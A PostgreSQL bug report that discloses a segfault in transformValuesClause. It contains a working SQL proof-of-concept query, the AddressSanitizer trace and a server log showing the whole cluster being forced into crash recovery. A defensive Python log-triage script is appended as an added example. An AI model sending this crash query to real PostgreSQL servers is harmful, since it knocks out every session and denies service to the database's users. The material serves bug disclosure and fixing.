BUG #17477: A crash bug in transformValuesClause()
From | PG Bug reporting form |
---|---|
Subject | BUG #17477: A crash bug in transformValuesClause() |
Date | |
Msg-id | 17477-0af3c6ac6b0a6ae0@postgresql.org |
Replies | Re: BUG #17477: A crash bug in transformValuesClause() (Masahiko Sawada <sawada.mshk@gmail.com>) |
List | pgsql-bugs |
The following bug has been logged on the website:

Bug reference: 17477
Logged by: Wang Ke
Email address: krking@zju.edu.cn
PostgreSQL version: 14.2
Operating system: Ubuntu 20.04.4 LTS x86_64
Description:

Hello,

I found a security bug recently in the latest release version of the PostgreSQL server (14.2) which causes a segmentation fault caused by a READ memory access. The details are as follows:

Reported by: Wang Ke of Zhejiang University

OS version and name: Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

PoC:

```sql
CREATE VIEW v0 AS SELECT ;
SELECT INTO GLOBAL TEMP TABLE v0 FROM v0 v1 ;
SET SESSION AUTHORIZATION 'x' ;
CREATE TEMP TABLE v1 ( v2 ) ON COMMIT DELETE ROWS AS VALUES ( 'x' ) , ( 'x' ) , ( 'x' ) ;
SELECT v2 , v2 FROM v0 AS v2 GROUP BY DISTINCT CUBE ( ( VALUES ( ( v2 . * ) ) FOR READ ONLY ) ) ;
```

Crash Log:

```
2022-05-09 17:00:56.605 CST [245199] LOG: statement: SELECT v2 , v2 FROM v0 AS v2 GROUP BY DISTINCT CUBE ( ( VALUES ( ( v2 . * ) ) FOR READ ONLY ) ) ;
AddressSanitizer:DEADLYSIGNAL
=================================================================
==245199==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000082 (pc 0x55e7ed66ad51 bp 0x7fff1c8b3cd0 sp 0x7fff1c8b3b10 T0)
==245199==The signal is caused by a READ memory access.
==245199==Hint: address points to the zero page.
    #0 0x55e7ed66ad50 in transformValuesClause postgresql-14.2/bld/../src/backend/parser/analyze.c:1512
    #1 0x55e7ed66ad50 in transformStmt postgresql-14.2/bld/../src/backend/parser/analyze.c:321
    #2 0x55e7ed670b70 in parse_sub_analyze postgresql-14.2/bld/../src/backend/parser/analyze.c:198
    #3 0x55e7ed6ce7d0 in transformSubLink postgresql-14.2/bld/../src/backend/parser/parse_expr.c:1797
    #4 0x55e7ed6ce7d0 in transformExprRecurse postgresql-14.2/bld/../src/backend/parser/parse_expr.c:229
    #5 0x55e7ed6cab66 in transformExpr postgresql-14.2/bld/../src/backend/parser/parse_expr.c:104
    #6 0x55e7ed6a90b8 in findTargetlistEntrySQL99 postgresql-14.2/bld/../src/backend/parser/parse_clause.c:2071
    #7 0x55e7ed6a9639 in findTargetlistEntrySQL92 postgresql-14.2/bld/../src/backend/parser/parse_clause.c:2040
    #8 0x55e7ed6b25f1 in transformGroupClauseExpr postgresql-14.2/bld/../src/backend/parser/parse_clause.c:2264
    #9 0x55e7ed6b2aca in transformGroupingSet postgresql-14.2/bld/../src/backend/parser/parse_clause.c:2449
    #10 0x55e7ed6b30fa in transformGroupClause postgresql-14.2/bld/../src/backend/parser/parse_clause.c:2571
    #11 0x55e7ed66b9cd in transformSelectStmt postgresql-14.2/bld/../src/backend/parser/analyze.c:1299
    #12 0x55e7ed66b9cd in transformStmt postgresql-14.2/bld/../src/backend/parser/analyze.c:323
    #13 0x55e7ed672aab in transformOptionalSelectInto postgresql-14.2/bld/../src/backend/parser/analyze.c:268
    #14 0x55e7ed672d21 in transformTopLevelStmt postgresql-14.2/bld/../src/backend/parser/analyze.c:218
    #15 0x55e7ed672e69 in parse_analyze postgresql-14.2/bld/../src/backend/parser/analyze.c:127
    #16 0x55e7edd5dadd in pg_analyze_and_rewrite postgresql-14.2/bld/../src/backend/tcop/postgres.c:657
    #17 0x55e7edd5ecbd in exec_simple_query postgresql-14.2/bld/../src/backend/tcop/postgres.c:1130
    #18 0x55e7edd606f1 in PostgresMain postgresql-14.2/bld/../src/backend/tcop/postgres.c:4486
    #19 0x55e7edbc765d in BackendRun postgresql-14.2/bld/../src/backend/postmaster/postmaster.c:4530
    #20 0x55e7edbc765d in BackendStartup postgresql-14.2/bld/../src/backend/postmaster/postmaster.c:4252
    #21 0x55e7edbc765d in ServerLoop postgresql-14.2/bld/../src/backend/postmaster/postmaster.c:1745
    #22 0x55e7edbca087 in PostmasterMain postgresql-14.2/bld/../src/backend/postmaster/postmaster.c:1417
    #23 0x55e7ed9c046e in main postgresql-14.2/bld/../src/backend/main/main.c:209
    #24 0x7ffaf632f0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
    #25 0x55e7ed37c5ed in _start (/usr/local/pgsql/bin/postgres+0x38d5ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV postgresql-14.2/bld/../src/backend/parser/analyze.c:1512 in transformValuesClause
==245199==ABORTING
2022-05-09 17:00:56.655 CST [245188] DEBUG: reaping dead processes
2022-05-09 17:00:56.655 CST [245188] DEBUG: server process (PID 245199) exited with exit code 1
2022-05-09 17:00:56.655 CST [245188] DETAIL: Failed process was running: SELECT v2 , v2 FROM v0 AS v2 GROUP BY DISTINCT CUBE ( ( VALUES ( ( v2 . * ) ) FOR READ ONLY ) ) ;
2022-05-09 17:00:56.655 CST [245188] LOG: server process (PID 245199) exited with exit code 1
2022-05-09 17:00:56.655 CST [245188] DETAIL: Failed process was running: SELECT v2 , v2 FROM v0 AS v2 GROUP BY DISTINCT CUBE ( ( VALUES ( ( v2 . * ) ) FOR READ ONLY ) ) ;
2022-05-09 17:00:56.655 CST [245188] LOG: terminating any other active server processes
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process 245196
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process 245192
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process 245191
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process 245193
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process 245194
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process 245195
2022-05-09 17:00:56.656 CST [245188] DEBUG: forked new backend, pid=245200 socket=9
2022-05-09 17:00:56.656 CST [245195] DEBUG: writing stats file "pg_stat/global.stat"
2022-05-09 17:00:56.656 CST [245195] DEBUG: writing stats file "pg_stat/db_32931.stat"
2022-05-09 17:00:56.656 CST [245200] FATAL: the database system is in recovery mode
2022-05-09 17:00:56.656 CST [245195] DEBUG: removing temporary stats file "pg_stat_tmp/db_32931.stat"
2022-05-09 17:00:56.656 CST [245195] DEBUG: writing stats file "pg_stat/db_13012.stat"
2022-05-09 17:00:56.656 CST [245200] DEBUG: shmem_exit(1): 0 before_shmem_exit callbacks to make
2022-05-09 17:00:56.656 CST [245200] DEBUG: shmem_exit(1): 0 on_shmem_exit callbacks to make
2022-05-09 17:00:56.656 CST [245200] DEBUG: proc_exit(1): 1 callbacks to make
2022-05-09 17:00:56.656 CST [245200] DEBUG: exit(1)
2022-05-09 17:00:56.656 CST [245195] DEBUG: removing temporary stats file "pg_stat_tmp/db_13012.stat"
2022-05-09 17:00:56.656 CST [245195] DEBUG: writing stats file "pg_stat/db_0.stat"
2022-05-09 17:00:56.656 CST [245200] DEBUG: shmem_exit(-1): 0 before_shmem_exit callbacks to make
2022-05-09 17:00:56.656 CST [245200] DEBUG: shmem_exit(-1): 0 on_shmem_exit callbacks to make
2022-05-09 17:00:56.656 CST [245200] DEBUG: proc_exit(-1): 0 callbacks to make
2022-05-09 17:00:56.656 CST [245195] DEBUG: removing temporary stats file "pg_stat_tmp/db_0.stat"
2022-05-09 17:00:56.657 CST [245195] DEBUG: shmem_exit(-1): 0 before_shmem_exit callbacks to make
2022-05-09 17:00:56.657 CST [245195] DEBUG: shmem_exit(-1): 0 on_shmem_exit callbacks to make
2022-05-09 17:00:56.657 CST [245195] DEBUG: proc_exit(-1): 0 callbacks to make
2022-05-09 17:00:56.658 CST [245188] DEBUG: reaping dead processes
2022-05-09 17:00:56.658 CST [245188] DEBUG: reaping dead processes
2022-05-09 17:00:56.659 CST [245188] DEBUG: reaping dead processes
2022-05-09 17:00:56.659 CST [245188] DEBUG: server process (PID 245200) exited with exit code 1
2022-05-09 17:00:56.659 CST [245188] LOG: all server processes terminated; reinitializing
2022-05-09 17:00:56.660 CST [245188] DEBUG: shmem_exit(1): 0 before_shmem_exit callbacks to make
2022-05-09 17:00:56.660 CST [245188] DEBUG: shmem_exit(1): 5 on_shmem_exit callbacks to make
2022-05-09 17:00:56.660 CST [245188] DEBUG: cleaning up dynamic shared memory control segment with ID 3198822830
2022-05-09 17:00:56.661 CST [245188] DEBUG: invoking IpcMemoryCreate(size=148815872)
2022-05-09 17:00:56.661 CST [245188] DEBUG: mmap(148897792) with MAP_HUGETLB failed, huge pages disabled: Cannot allocate memory
2022-05-09 17:00:56.666 CST [245188] DEBUG: dynamic shared memory system will support 674 segments
2022-05-09 17:00:56.667 CST [245188] DEBUG: created dynamic shared memory control segment 1631943408 (26976 bytes)
2022-05-09 17:00:56.668 CST [245201] LOG: database system was interrupted; last known up at 2022-05-09 17:00:07 CST
2022-05-09 17:00:56.668 CST [245201] DEBUG: removing all temporary WAL segments
2022-05-09 17:00:56.679 CST [245201] DEBUG: checkpoint record is at 0/D97D880
2022-05-09 17:00:56.679 CST [245201] DEBUG: redo record is at 0/D97D880; shutdown true
2022-05-09 17:00:56.679 CST [245201] DEBUG: next transaction ID: 954; next OID: 73880
2022-05-09 17:00:56.679 CST [245201] DEBUG: next MultiXactId: 1; next MultiXactOffset: 0
2022-05-09 17:00:56.679 CST [245201] DEBUG: oldest unfrozen transaction ID: 726, in database 1
2022-05-09 17:00:56.679 CST [245201] DEBUG: oldest MultiXactId: 1, in database 1
2022-05-09 17:00:56.679 CST [245201] DEBUG: commit timestamp Xid oldest/newest: 0/0
2022-05-09 17:00:56.679 CST [245201] DEBUG: transaction ID wrap limit is 2147484373, limited by database with OID 1
2022-05-09 17:00:56.679 CST [245201] DEBUG: MultiXactId wrap limit is 2147483648, limited by database with OID 1
2022-05-09 17:00:56.679 CST [245201] DEBUG: starting up replication slots
2022-05-09 17:00:56.679 CST [245201] DEBUG: starting up replication origin progress state
2022-05-09 17:00:56.679 CST [245201] LOG: database system was not properly shut down; automatic recovery in progress
```
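For triaging a report like this from the server side, the following is an added example (not part of the bug report and not PostgreSQL code) that reads postmaster log lines and an AddressSanitizer report of the shape quoted above, ties the sanitizer's top frame to the backend PID the postmaster later reports dead, and classifies each exit. The sample lines are copied from the crash log above and trimmed; the final line with PID 4242 is constructed to show how a build without sanitizers reports the same kind of failure. The three-way classification (signal, sanitizer abort, plain FATAL exit) is this example's own rule, motivated by the fact that PID 245200 in the log exits with code 1 merely because it hit the "database system is in recovery mode" FATAL.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Postmaster log line: "<timestamp> <tz> [<pid>] <LEVEL>: <message>"
PG_LINE = re.compile(
    r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+ \S+) \[(\d+)\] (\w+):\s+(.*)$")
# Both ways the postmaster reports a dead backend
CRASH_MSG = re.compile(
    r"server process \(PID (\d+)\) (exited with exit code \d+|was terminated by signal \d+.*)")
FAILED_STMT = re.compile(r"Failed process was running:\s+(.*)")
# AddressSanitizer header and stack frame lines
ASAN_ERROR = re.compile(
    r"^==(\d+)==ERROR: AddressSanitizer: (\S+) on unknown address (0x[0-9a-f]+)")
ASAN_FRAME = re.compile(r"^\s*#(\d+) 0x[0-9a-f]+ in (\S+) (\S+)")


@dataclass
class CrashEvent:
    pid: int                          # backend that died
    reason: str                       # text after "server process (PID n)"
    statement: Optional[str] = None   # from the DETAIL line, if any
    asan_kind: Optional[str] = None
    fault_address: Optional[str] = None
    top_function: Optional[str] = None
    top_location: Optional[str] = None

    def kind(self) -> str:
        # Exit code 1 is also how an ordinary FATAL ereport ends a backend,
        # so on its own it is not evidence of a crash (example's own rule).
        if self.reason.startswith("was terminated by signal"):
            return "signal"
        if self.asan_kind is not None:
            return "sanitizer_abort"
        return "fatal_exit"


def parse_crash_events(log_text: str) -> List[CrashEvent]:
    asan: Dict[int, dict] = {}        # backend pid -> sanitizer details
    current: Optional[dict] = None    # sanitizer report currently being read
    events: List[CrashEvent] = []
    for raw in log_text.splitlines():
        m = ASAN_ERROR.match(raw)
        if m:
            current = {"kind": m.group(2), "addr": m.group(3)}
            asan[int(m.group(1))] = current
            continue
        m = ASAN_FRAME.match(raw)
        if m and current is not None and m.group(1) == "0":
            current["func"], current["loc"] = m.group(2), m.group(3)
            continue
        m = PG_LINE.match(raw)
        if not m:
            continue
        level, msg = m.group(3), m.group(4)
        c = CRASH_MSG.search(msg)
        if c:
            pid = int(c.group(1))
            # The postmaster reports one exit twice (DEBUG, then LOG): one event.
            if events and events[-1].pid == pid:
                continue
            info = asan.get(pid, {})
            events.append(CrashEvent(pid=pid, reason=c.group(2),
                                     asan_kind=info.get("kind"), fault_address=info.get("addr"),
                                     top_function=info.get("func"), top_location=info.get("loc")))
        elif level == "DETAIL" and events:
            f = FAILED_STMT.match(msg)
            if f and events[-1].statement is None:
                events[-1].statement = f.group(1).strip()
    return events


def summarize(events: List[CrashEvent]) -> List[str]:
    """One triage line per event: class, backend, reason, top frame, statement."""
    out = []
    for ev in events:
        where = f" in {ev.top_function} ({ev.top_location})" if ev.top_function else ""
        stmt = f" while running: {ev.statement}" if ev.statement else ""
        out.append(f"[{ev.kind()}] backend {ev.pid} {ev.reason}{where}{stmt}")
    return out


# Sample input: lines copied from the report's crash log (trimmed), plus one
# constructed final line (PID 4242) in the form a non-sanitizer build logs.
SAMPLE_LOG = """\
2022-05-09 17:00:56.605 CST [245199] LOG: statement: SELECT v2 , v2 FROM v0 AS v2 GROUP BY DISTINCT CUBE ( ( VALUES ( ( v2 . * ) ) FOR READ ONLY ) ) ;
==245199==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000082 (pc 0x55e7ed66ad51 bp 0x7fff1c8b3cd0 sp 0x7fff1c8b3b10 T0)
    #0 0x55e7ed66ad50 in transformValuesClause postgresql-14.2/bld/../src/backend/parser/analyze.c:1512
SUMMARY: AddressSanitizer: SEGV postgresql-14.2/bld/../src/backend/parser/analyze.c:1512 in transformValuesClause
2022-05-09 17:00:56.655 CST [245188] DEBUG: server process (PID 245199) exited with exit code 1
2022-05-09 17:00:56.655 CST [245188] DETAIL: Failed process was running: SELECT v2 , v2 FROM v0 AS v2 GROUP BY DISTINCT CUBE ( ( VALUES ( ( v2 . * ) ) FOR READ ONLY ) ) ;
2022-05-09 17:00:56.655 CST [245188] LOG: server process (PID 245199) exited with exit code 1
2022-05-09 17:00:56.656 CST [245200] FATAL: the database system is in recovery mode
2022-05-09 17:00:56.659 CST [245188] DEBUG: server process (PID 245200) exited with exit code 1
2022-05-09 17:01:30.000 CST [245188] LOG: server process (PID 4242) was terminated by signal 11: Segmentation fault
"""
```

Running `summarize(parse_crash_events(SAMPLE_LOG))` yields three lines: the sanitizer abort in `transformValuesClause` at `analyze.c:1512` with the offending statement, the recovery-mode exit of PID 245200 classified as an ordinary FATAL exit, and the constructed signal 11 line. Pointing it at a real `postgresql.log` is a cheap way to separate genuine backend crashes (which force the whole cluster through the crash-recovery cycle visible in the log above) from the many benign exit-code-1 lines a busy server produces.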